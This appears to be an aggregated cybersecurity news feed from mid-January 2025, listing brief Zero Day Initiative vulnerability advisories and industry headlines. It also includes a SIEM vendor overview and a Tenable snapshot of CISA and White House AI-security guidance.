This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2025-0574.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-054: Sante PACS Server Web Portal DCM File Parsing Directory Traversal Arbitrary File Write Vulnerability
This vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-0572.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-053: Sante PACS Server DCM File Parsing Directory Traversal Arbitrary File Write Vulnerability
This vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-0573.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-052: Sante PACS Server DCM File Parsing Memory Corruption Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0569.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-051: Sante PACS Server Web Portal DCM File Parsing Memory Corruption Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0571.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-050: Sante PACS Server Web Portal DCM File Parsing Memory Corruption Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0570.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-049: Sante PACS Server DCM File Parsing Memory Corruption Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0568.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-048: Apple WebKit WebCore ContainerNode Use-After-Free Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple WebKit. User interaction is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-27856.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-047: WinZip 7Z File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8811.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-046: Adobe Photoshop node_modules Uncontrolled Search Path Element Local Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Adobe Photoshop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-21127.
by Zero Day Initiative Advisories
2025-01-19 16:19:26
TikTok ban takes hold: data reveals sharp traffic decline and rapid shift to alternatives
On January 19, 2025, ByteDance shut down access to TikTok and other owned/operated apps for US users, causing an 85% traffic plunge and a rapid shift to alternatives like RedNote.
by Cloudflare
2025-01-19 16:00:00
Employees of failed startups are at special risk of stolen personal data through old Google logins
As if losing your job when the startup you work for collapses isn’t bad enough, now a security researcher has found that employees at failed startups are at particular risk of having their data stolen. This ranges from their private Slack messages to Social Security numbers and, potentially, bank accounts. The researcher who discovered the […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-19 10:54:00
TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025
Popular video-sharing social network TikTok has officially gone dark in the United States, as a federal ban on the app comes into effect on January 19, 2025. "We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable," the company said in a pop-up message. "We're working to restore our service in the U.S. as soon as possible
by The Hacker News
2025-01-19 05:39:26
How to Get Around the US TikTok Ban
TikTok is now unavailable in the United States—and getting around the ban isn’t as simple as using a VPN. Here’s what you need to know.
by WIRED Security News
2025-01-19 00:00:00
ZDI-25-045: 7-Zip Mark-of-the-Web Bypass Vulnerability
This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2025-0411.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-044: Ivanti Avalanche SecureFilter Authentication Bypass Vulnerability
This vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13179.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-043: Ivanti Avalanche Faces ResourceManager Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13180.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-042: Ivanti Avalanche SecureFilter allowPassThrough Authentication Bypass Vulnerability
This vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13181.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-041: Ivanti Endpoint Manager updateAssetInfo SQL Injection Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13162.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-040: Ivanti Endpoint Manager DecodeBase64Object Deserialization of Untrusted Data Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13163.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-039: Ivanti Endpoint Manager AlertService Uninitialized Memory Information Disclosure Vulnerability
This vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.2. The following CVEs are assigned: CVE-2024-13164.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-038: Ivanti Endpoint Manager Improper Input Validation AlertService Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13165.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-037: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13166.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-036: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13167.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-035: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13168.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-034: Ivanti Endpoint Manager AlertService Type Confusion Information Disclosure Vulnerability
This vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-13169.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-033: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service Vulnerability
This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13170.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-032: Ivanti Endpoint Manager HIIDriver Improper Verification of Cryptographic Signature Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13172.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-031: Ivanti Endpoint Manager MyResolveEventHandler Untrusted Search Path Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13158.
by Zero Day Initiative Advisories
2025-01-18 15:27:12
DOJ confirms arrested US Army soldier is linked to AT&T and Verizon hacks
The alleged hacker claimed to have access to huge amounts of call records, including those of VP Kamala Harris and President Trump. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-18 15:12:00
You need a router-based VPN in 2025. Here's why and how to set one up
Using a VPN alone is no longer enough. Here's how to pair the WireGuard protocol with your favorite VPN to protect your entire network.
by ZDNET Security
2025-01-18 12:00:00
How victims of PowerSchool’s data breach helped each other investigate ‘massive’ hack
School workers say they resorted to crowdsourcing help among each other following PowerSchool's breach, fueled by solidarity and the slow response from PowerSchool.
by TechCrunch
2025-01-18 11:36:00
U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Salt Typhoon
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. "People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent
by The Hacker News
2025-01-18 11:30:00
US Names One of the Hackers Allegedly Behind Massive Salt Typhoon Breaches
Plus: New details emerge about China’s cyber espionage against the US, the FBI remotely uninstalls malware on 4,200 US devices, and victims of the PowerSchool edtech breach reveal what hackers stole.
by WIRED Security News
2025-01-18 11:00:00
Navigating IT Liability in 2025: Strategies for Mitigating Risks
As cyberthreats evolve and data privacy laws tighten, companies must address IT liability. Here are key steps every company should take.
by ITPro Today
2025-01-18 10:00:00
CES 2025: 8 Eye-Grabbing Tech Innovations
CES 2025 showcased a blend of cutting-edge AI innovations and standout hardware, proving the future of tech is as imaginative as ever.
by ITPro Today
2025-01-17 22:22:05
How VCs Are Looking at AI Startups Today
VC firms are focusing on both the technology and the teams behind AI startups, recognizing that successful investments will require adaptability, strategic direction, and innovation in a rapidly evolving market.
by ITPro Today
2025-01-17 22:03:46
Has the TikTok Ban Already Backfired on US Cybersecurity?
The Supreme Court has affirmed TikTok's ban in the US, which has its users in revolt and is creating a whole new set of national cybersecurity concerns.
by Dark Reading
2025-01-17 21:53:23
Effective Security Awareness Training Really Does Reduce Data Breaches
Social engineering and phishing are involved in 70% - 90% of data breaches. No other root cause of malicious hacking (e.g., unpatched software and firmware, eavesdropping, cryptography attacks, physical theft, etc.) comes close.
by KnowBe4
2025-01-17 20:25:59
National Security Memorandum (NSM) on Artificial Intelligence: Democracy + Tech Initiative Markup
On October 24, 2024, the Biden Administration released its National Security Memorandum (NSM) on Artificial Intelligence. Read along with AC Tech Programs staff, fellows, and industry experts for commentary and analysis.
by DFRLab
2025-01-17 20:23:43
Employees Enter Sensitive Data Into GenAI Prompts Far Too Often
The propensity for users to enter customer data, source code, employee benefits information, financial data, and more into ChatGPT, Copilot, and others is racking up real risk for enterprises.
by Dark Reading
2025-01-17 19:44:31
15K Fortinet Device Configs Leaked to the Dark Web
The stolen firewall data is thorough but more than 2 years old now, meaning that most organizations following even basic security practices face minimal risk, hopefully.
by Dark Reading
2025-01-17 19:43:18
US Sanctions Chinese Hacker & Firm for Treasury, Critical Infrastructure Breaches
The cyber actor played a role in the Treasury breach as well as attacks on critical infrastructure, linked to China-backed advanced persistent threat (APT) group Salt Typhoon.
by Dark Reading
2025-01-17 19:38:00
Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation
Cybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. "These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker
by The Hacker News
2025-01-17 18:56:12
Detecting and mitigating CVE-2024-12084: rsync remote code execution
On Tuesday, January 14, 2025, a set of vulnerabilities were announced that affect the “rsync” utility. rsync allows files and...
by Sysdig
2025-01-17 18:48:19
The FCC’s Jessica Rosenworcel Isn’t Leaving Without a Fight
As the US faces “the worst telecommunications hack in our nation’s history,” by China’s Salt Typhoon hackers, the outgoing FCC chair is determined to bolster network security if it’s the last thing she does.
by WIRED Security News
2025-01-17 18:36:00
Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation
Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks
by The Hacker News
2025-01-17 18:04:45
SIEM Vendors: Leading the Way in Cybersecurity Monitoring and Threat Detection
The ability to detect, analyze, and respond to threats in real-time is critical. Security Information and Event Management solutions play a pivotal role in helping organizations achieve this by providing a comprehensive view of their IT environment, detecting anomalies, and offering actionable insights for incident response. The SIEM market has grown substantially, with numerous vendors offering a variety of solutions tailored to meet different business needs. In this article, we will explore the leading SIEM vendors and what they offer.

What is SIEM
Security Information and Event Management (SIEM) refers to the technology that combines security information management (SIM) and security event management (SEM). SIEM solutions collect and aggregate log data from a variety of sources (network devices, applications, security tools, etc.), providing real-time monitoring, event correlation, and security alerting. These solutions enable businesses to detect potential security breaches, respond promptly, and maintain compliance with industry regulations.

Key functionalities of SIEM include:
- Log Management: Collecting and storing logs from diverse sources.
- Event Correlation: Analyzing logs to identify security threats.
- Alerting and Reporting: Triggering alerts based on suspicious activity and generating compliance reports.
- Incident Response: Providing information to facilitate the detection and resolution of security incidents.

Leading SIEM Vendors in the Market

Splunk
Overview: Splunk is one of the most popular and well-known SIEM vendors, offering an advanced platform for searching, monitoring, and analyzing machine data. It provides a comprehensive security solution, allowing businesses to gain deep visibility into their IT infrastructure and respond to security incidents effectively.
Key Features:
- Powerful search and analytics engine.
- Real-time security monitoring and alerting.
- Advanced correlation capabilities to detect complex threats.
- Scalability to handle large amounts of data.
Best for: Enterprises requiring flexible, customizable, and highly scalable solutions.

IBM QRadar
Overview: IBM QRadar is a robust SIEM platform that offers comprehensive security monitoring, event correlation, and real-time data analysis. It integrates seamlessly with other IBM security products and provides a unified view of an organization’s security posture.
Key Features:
- Advanced threat detection and analytics.
- Pre-configured security use cases for faster deployment.
- High-quality reporting and compliance support.
- Automated incident response workflows.
Best for: Large enterprises and organizations with complex security environments.

LogRhythm
Overview: LogRhythm is a well-regarded SIEM vendor that focuses on providing an integrated security platform. It offers a comprehensive solution for threat detection, monitoring, and compliance. LogRhythm is known for its ease of use and ability to integrate with existing IT infrastructure.
Key Features:
- Centralized log management and real-time event correlation.
- Advanced anomaly detection and behavioral analytics.
- Automated workflows for incident response.
- Out-of-the-box integrations with many security tools and systems.
Best for: Mid-sized businesses looking for an intuitive, easy-to-deploy solution.

SolarWinds
Overview: SolarWinds is a well-known IT management company that also offers a powerful SIEM solution. SolarWinds’ SIEM solution is particularly well-suited for businesses looking for a cost-effective, scalable, and user-friendly platform.
Key Features:
- Real-time monitoring and security event correlation.
- Incident response and alerting.
- Integrated network performance monitoring.
- Customizable dashboards and reports.
Best for: Small to mid-sized businesses and organizations with a focus on network performance.

AlienVault (AT&T Cybersecurity)
Overview: AlienVault, now part of AT&T Cybersecurity, is an affordable, cloud-based SIEM solution that offers essential features for threat detection and compliance. It is popular among businesses that require a budget-friendly option with high-quality threat intelligence.
Key Features:
- Built-in threat intelligence feeds.
- Automated log collection and analysis.
- Compliance reporting (PCI DSS, HIPAA, GDPR).
- Simple, easy-to-deploy solution with cloud-based options.
Best for: Small businesses and organizations with limited resources seeking a user-friendly solution.

Sumo Logic
Overview: Sumo Logic is a cloud-native SIEM solution known for its ease of deployment and scalability. The platform is designed to handle large-scale environments and provides real-time analytics, monitoring, and insights.
Key Features:
- Cloud-based architecture for seamless scalability.
- Real-time monitoring and log analytics.
- Machine learning-powered anomaly detection.
- Integrated compliance and security monitoring.
Best for: Organizations adopting a cloud-first strategy and businesses with large, distributed environments.

McAfee Enterprise Security Manager (ESM)
Overview: McAfee’s Enterprise Security Manager (ESM) offers real-time threat intelligence, log management, and event correlation. It is particularly well-suited for organizations looking to integrate SIEM with McAfee’s security products for enhanced threat protection.
Key Features:
- Automated incident detection and response.
- Centralized log management for large enterprises.
- Integration with McAfee’s security ecosystem.
- Compliance reporting and auditing.
Best for: Enterprises with existing McAfee security solutions and those seeking deep integration with endpoint protection.

Fortinet FortiSIEM
Overview: FortiSIEM is a unified SIEM solution that offers comprehensive security monitoring, analytics, and response capabilities. The platform is integrated with Fortinet’s suite of cybersecurity solutions, providing enhanced visibility into network security.
Key Features:
- Correlation of security events from multiple sources.
- Threat intelligence integration for better detection.
- Real-time monitoring and compliance reporting.
- Scalability for large and complex environments.
Best for: Organizations already using Fortinet products or those needing a highly integrated security solution.

Choosing the Right SIEM Vendor
Selecting the right SIEM solution depends on various factors, including your organization’s size, complexity, security needs, and budget. Here are a few considerations to keep in mind when choosing a SIEM vendor:
- Scalability: Ensure the SIEM solution can scale as your organization grows.
- Ease of Use: Choose a platform that your team can easily deploy and manage.
- Integration: Ensure the SIEM solution can integrate with your existing security infrastructure and tools.
- Customization: Look for a solution that can be tailored to meet your organization’s specific security needs.
- Threat Intelligence: Ensure the solution provides strong threat intelligence feeds and advanced analytics for accurate threat detection.

Conclusion
The market for SIEM solutions is diverse, with many vendors offering specialized capabilities designed to meet the varying needs of businesses across different industries. Whether you’re a large enterprise or a small business, choosing the right SIEM vendor can significantly enhance your security posture by enabling better visibility, quicker threat detection, and more effective incident response. By understanding the strengths and capabilities of each SIEM vendor, organizations can make informed decisions and select the platform that best fits their needs, ultimately improving their overall cybersecurity defense.
by HACKLIDO
2025-01-17 17:10:38
Treasury sanctions Salt Typhoon hacking group behind breaches of major US telecom firms
The US government has also sanctioned the hacker responsible for December's US Treasury hack
by TechCrunch
2025-01-17 17:05:43
Malware stole internal PowerSchool passwords from engineer’s hacked computer
The theft of a PowerSchool engineer's passwords prior to the breach raises further doubts about the company's security practices.
by TechCrunch
2025-01-17 16:34:29
Biden's Cybersecurity EO Leaves Trump a Comprehensive Blueprint for Defense
New order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?
by ITPro Today
2025-01-17 16:25:04
WhatsApp spear phishing campaign uses QR codes to add device
A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...
by Malwarebytes Labs
2025-01-17 15:51:00
How to Bring Zero Trust to Wi-Fi Security with a Cloud-based Captive Portal?
Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access,
by The Hacker News
2025-01-17 15:37:00
New 'Sneaky 2FA' Phishing Kit Targets Microsoft 365 Accounts with 2FA Code Bypass
Cybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that's capable of Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting
by The Hacker News
2025-01-17 15:37:00
U.S. Sanctions North Korean IT Worker Network Supporting WMD Programs
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People's Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions. "These
by The Hacker News
2025-01-17 15:11:12
Advanced Persistent Threat (APT): Examples and Prevention
Advanced persistent threats (APTs) use sophisticated tools and techniques to breach systems and maintain access—all while remaining undetected. Unlike other cyberattacks, APTs work over an extended period, using more resources to achieve specific objectives, such as stealing sensitive data or bringing down operations.
by Legit Security
2025-01-17 15:00:00
Leveraging Behavioral Insights to Counter LLM-Enabled Hacking
As LLMs broaden access to hacking and diversify attack strategies, understanding the thought processes behind these innovations will be vital for bolstering IT defenses.
by Dark Reading
2025-01-17 14:46:39
Tarbomb Denial of Service via Path Traversal
Praetorian recently uncovered a denial-of-service vulnerability by chaining together path traversal and legacy file upload features in a CI/CD web application, highlighting the risks of undocumented features and the importance of input validation in web security.
by Praetorian
2025-01-17 14:00:00
Your KnowBe4 Compliance Plus Fresh Content Updates from December 2024
Check out the December updates in Compliance Plus so you can stay on top of featured compliance training content.
by KnowBe4
2025-01-17 14:00:00
How to calculate your AI-powered cybersecurity’s ROI
Imagine this scenario: A sophisticated, malicious phishing campaign targets a large financial institution. The attackers use emails generated by artificial intelligence (AI) that closely mimic the company’s internal communications. The emails contain malicious links designed to steal employee credentials, which the attackers could use to gain access to company assets and data for unknown purposes. […]
by Security Intelligence
2025-01-17 13:32:19
Ransomware Gangs Claimed More Than 5,000 Attacks in 2024
Ransomware groups claimed responsibility for 5,461 attacks in 2024, with 1,204 of these attacks being publicly confirmed by victim organizations, according to Comparitech’s latest Ransomware Roundup report.
by KnowBe4
2025-01-17 13:22:06
Hype and confusion surrounding quantum computers in cryptography
Who claimed quantum supremacy and decryption on quantum computers?
by Kaspersky
2025-01-17 12:00:00
PowerShell Arrays: How To Build, Manipulate, and Manage Them
PowerShell arrays support dynamic operations like adding, modifying, or removing elements, and can also be filtered and manipulated using advanced techniques like slicing, joining, and looping through array items.
by ITPro Today
2025-01-17 11:34:32
Blue Yonder investigating Clop ransomware threat linked to exploited Cleo CVEs
The financially-motivated hacker was previously linked to the mass exploitation of critical vulnerabilities in MOVEit file-transfer software.
by Cybersecurity Dive
2025-01-17 11:00:00
Cloud & Edge Computing Trends and Predictions 2025 From Industry Insiders
IT leaders and industry insiders share their cloud computing and edge computing trends and predictions for 2025.
by ITPro Today
2025-01-17 10:00:33
Mercedes-Benz Head Unit security research report
Kaspersky experts analyzed the Mercedes-Benz head unit, its IPC protocols and firmware, and found new vulnerabilities via physical access.
by Securelist
2025-01-17 09:46:03
Why Enterprises Are Prioritizing Employee Experience — Again
With the tech talent shortage, organizations are having a tough time hiring and retaining the right talent. Employee experience matters greatly.
by ITPro Today
2025-01-17 09:44:00
European Privacy Group Sues TikTok and AliExpress for Illicit Data Transfers to China
Austrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users' data to China. The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data
by The Hacker News
2025-01-17 09:20:13
Recognizing Signs of Trouble in Your Kubernetes Environment
Traditional observability tools fall short in capturing Kubernetes' complexity; modern solutions must go beyond metrics and logs to deliver proactive, holistic management of cloud-native environments.
by ITPro Today
2025-01-17 09:18:00
FCC enacts rule requiring telecom operators to secure networks
The agency’s declaratory ruling took effect Thursday, but the future outlook of that effort and a separate proposed rule remain uncertain under the incoming administration.
by Cybersecurity Dive
2025-01-17 09:00:00
Cybersecurity Snapshot: CISA Lists Security Features OT Products Should Have and Publishes AI Collaboration Playbook
Shopping for OT systems? A new CISA guide outlines OT cyber features to look for. Meanwhile, the U.S. government publishes a playbook for collecting AI vulnerability data. Plus, a White House EO highlights AI security goals. And get the latest on IoT security; secure app dev; and tougher HIPAA cyber rules.

Dive into six things that are top of mind for the week ending Jan. 17.

1 - How to choose cybersecure OT products
Is your organization evaluating operational technology (OT) products for purchase? If so, a new guide from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) aims to help OT operators choose OT products designed with strong cybersecurity features.

The publication, titled “Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products,” highlights 12 cybersecurity elements that OT products should have, including:
- Support for controlling and tracking modifications to configuration settings
- Logging of all actions using open-standard logging formats
- Rigorous testing for vulnerabilities and timely provision of free and easy-to-install patches and updates
- Strong authentication methods such as role-based access control and phishing-resistant multi-factor authentication to prevent unauthorized access
- Protection of the integrity and confidentiality of data at rest and in transit

According to CISA, many OT products aren’t designed and developed securely, so they ship with security issues such as weak authentication, known vulnerabilities and insecure default settings. In fact, the agency says it’s common for hackers to target handpicked OT products instead of going after specific organizations. Thus, it’s critical for organizations, especially those in critical infrastructure sectors, to pick OT products built securely by using CISA’s “Secure by Design” principles.

“When security is not prioritized nor incorporated directly into OT products, it is difficult and costly for owners and operators to defend their OT assets against compromise,” reads the guide, published in collaboration with other U.S. and international agencies.

For more information about OT systems cybersecurity, check out these Tenable resources:
- “What is operational technology (OT)?” (guide)
- “Discover, Measure, and Minimize the Risk Posed by Your Interconnected IT/OT/IoT Environments” (on-demand webinar)
- “How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)
- “Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)
- “OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)

2 - JCDC publishes playbook to collect AI security info
A new playbook published by the U.S. government aims to facilitate the collective, voluntary sharing of information among AI providers, developers and users about AI vulnerabilities and cyber incidents.

The “AI Cybersecurity Collaboration Playbook” from CISA’s Joint Cyber Defense Collaborative (JCDC) details ways in which AI community members in government and in the private sector – both in the U.S. and abroad – can collaborate to help boost AI security for everybody.

“The development of this playbook is a major milestone in our efforts to secure AI systems through active collaboration,” CISA Director Jen Easterly said in a statement.

AI systems introduce unique cybersecurity challenges which make them vulnerable to attacks including model poisoning, data manipulation and malicious inputs. “These vulnerabilities, coupled with the rapid adoption of AI systems, demand comprehensive strategies and public-private partnership to address evolving risks,” the 33-page playbook reads.

By collecting, analyzing and enriching information on AI vulnerabilities and cyber incidents, CISA would be able to help the AI community in a variety of ways, including by:
- Sharing information to improve detection and prevention of AI threats
- Exposing attackers’ tactics and infrastructure
- Identifying and notifying victims
- Generating threat advisories and intelligence reports
- Offering tailored recommendations, vulnerability management strategies and cyber defense best practices

The playbook’s target audience is operational cybersecurity professionals, including incident responders and security analysts, and its goal is to help them collaborate and share information with CISA and JCDC about AI security.

In addition, CISA also envisions organizations adopting the document’s guidance internally “to enhance their own information-sharing practices, contributing to a unified approach to AI-related threats across critical infrastructure.”

For more information about industry efforts for collaborating on AI security:
- Cloud Security Alliance’s “AI Safety Initiative”
- MITRE’s “AI Incident Sharing initiative”
- Open Worldwide Application Security Project’s “AI Exchange”
- U.S. government’s “Testing Risks of AI for National Security (TRAINS) Taskforce”

3 - New White House cybersecurity EO includes AI requirements
The Biden Administration issued a sweeping cybersecurity executive order (EO) this week aimed at boosting U.S. cyberdefenses, and AI security is one area that it says must be strengthened.

The “Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity” calls for promoting security “with and in” AI, saying it can speed up the identification of new vulnerabilities, scale up threat detection and automate cyberdefenses.

“The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity,” the executive order reads.

Among the executive order’s requirements for AI are:
- Launching a pilot program on using AI to improve cyberdefense of critical infrastructure in the energy sector. The Secretaries of Energy, Defense and Homeland Security would be in charge of the program, in collaboration with private-sector critical infrastructure organizations. The program may include:
  - vulnerability detection
  - automatic patch management
  - identification and categorization of anomalous and malicious activity across IT or OT systems
- The Secretary of Defense must establish a program to use advanced AI models for cyberdefense.
- The Secretaries of Commerce, Energy and Homeland Security, and the National Science Foundation Director, must prioritize funding for their respective programs that encourage the development of “large-scale, labeled datasets needed to make progress on cyber defense research.”
- The Secretaries of Defense and Homeland Security, and the Director of National Intelligence must incorporate management of AI software vulnerabilities and compromises into their agencies’ process and “and interagency coordination mechanisms for vulnerability management.” These efforts should include incident tracking, response, reporting and sharing AI systems’ indicators of compromise.

These AI-related actions all must be completed at various dates during 2025.

